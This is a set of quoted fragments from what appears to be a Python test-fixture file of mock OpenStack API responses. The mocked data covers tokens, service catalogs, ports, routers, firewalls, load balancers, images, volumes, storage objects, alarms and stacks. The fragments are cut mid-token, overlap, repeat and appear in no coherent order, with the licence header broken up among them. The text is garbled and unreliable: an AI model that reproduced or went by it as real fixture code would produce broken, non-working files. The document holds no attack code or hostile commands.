"\"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS",
"'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58',",
"[FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy",
"\"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\",",
"\"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\":",
"= [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS =",
"{ 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"[ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0],",
"[], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL':",
"\"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\":",
"governing permissions and limitations # under the License. TOKEN_ID = '<KEY>' USER_ID =",
"\"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\":",
"\"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\":",
"\"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" }",
"'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': {",
"'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT,",
"}, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\":",
"\"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ {",
"\"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ],",
"[ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\":",
"\"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\":",
"= { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL':",
"u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel':",
"\"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\":",
"\"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ],",
"\"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS =",
"{ \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\":",
"= { u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel':",
"= { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\":",
"\"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ {",
"None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\",",
"\"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\",",
"= 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT =",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL':",
"use this file except in compliance with the License. You may obtain #",
"\"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\":",
"\"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ { \"description\": \"First",
"LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [],",
"\"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ {",
"STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\":",
"\"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\"",
"PROJECT_ID }, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\":",
"\"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\":",
"PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None,",
"\"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST",
"True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"],",
"25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\",",
"\"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\":",
"PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None,",
"[ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\":",
"\"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\":",
"\"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\":",
"\"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\",",
"# Copyright © 2014 Cloudwatt # # Licensed under the Apache License, Version",
"u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain']",
"} ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\":",
"[\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS",
"for the specific language governing permissions and limitations # under the License. TOKEN_ID",
"LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\":",
"u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = { \"routers\": [{",
"{ \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1],",
"}, { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\":",
"], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True,",
"\"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\":",
"\"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None,",
"KIND, either express or implied. See the # License for the specific language",
"{'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"]",
"= { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume",
"\"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] }",
"'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST =",
"[ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\":",
"file except in compliance with the License. You may obtain # a copy",
"unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" }",
"= [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello",
"0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1]",
"[ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\":",
"\"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\",",
"\"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80,",
"[\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\"",
"True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser',",
"METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS",
"{ \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\":",
"} ] STACKS_LIST = { \"stacks\": [ { \"description\": \"First test\", \"links\": [",
"[], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\":",
"USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser'",
"Storage Service', 'type': 'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL':",
"the # License for the specific language governing permissions and limitations # under",
"'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT,",
"}, { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\",",
"\"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\":",
"\"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\":",
"\"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\",",
"FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS",
"\"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\",",
"\"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\":",
"}, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\":",
"], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\": \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"",
"\"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\":",
"{ \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\":",
"or agreed to in writing, software # distributed under the License is distributed",
"\"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS =",
"[ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" }",
"'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\",",
"\"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\",",
"\"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\":",
"}, { \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" }",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL':",
"\"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {},",
"\"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }",
"'object-store' }, { 'endpoints': [{ 'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '',",
"\"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [",
"METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' },",
"License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS",
"1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\",",
"{ \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\",",
"\"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\":",
"\"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\":",
"\"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" },",
"True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\":",
"'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696', 'internalURL': NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service',",
"{u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id':",
"\"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\":",
"\"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS",
"\"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None,",
"\"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST",
"\"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80,",
"\"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\":",
"\"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1],",
"PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ]",
"\"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\":",
"\"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"]",
"LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\":",
"\"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\":",
"None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"\"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0],",
"LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN =",
"] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\",",
"\"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\":",
"Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not",
"'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5'",
"\"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\":",
"u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name':",
"25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova',",
